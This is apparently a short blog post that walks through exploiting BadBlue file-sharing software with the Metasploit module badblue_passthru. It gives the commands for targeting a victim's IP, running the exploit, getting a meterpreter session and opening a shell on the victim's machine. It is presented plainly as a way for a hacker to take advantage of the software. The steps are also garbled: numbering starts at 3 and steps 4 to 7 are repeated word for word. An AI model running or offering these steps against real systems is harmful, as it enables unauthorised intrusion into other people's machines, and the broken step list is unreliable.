Introduction of BadBlue :-
Basically it used for file sharing many organization use this software for file sharing
& hacker can take advanctage of it how ?? lets see.....
Steps:-
3. Now type "use exploit/windows/http/badblue_passthru" and hit enter.
4. Set the required arguments for the exploit for this type "show options" it will give required argument we want to set.
5. Type "set rhost <ip_address of victim>" hit enter.
6. Now final type "exploit" to exploit our victim remotely.
7. When you get the meterpreter session it means you are in the victim system for check type "sysinfo" to see information about our victim. and type "shell" to interact with victim's cmd.
4. Set the required arguments for the exploit for this type "show options" it will give required argument we want to set.
5. Type "set rhost <ip_address of victim>" hit enter.
6. Now final type "exploit" to exploit our victim remotely.
7. When you get the meterpreter session it means you are in the victim system for check type "sysinfo" to see information about our victim. and type "shell" to interact with victim's cmd.
No comments:
Post a Comment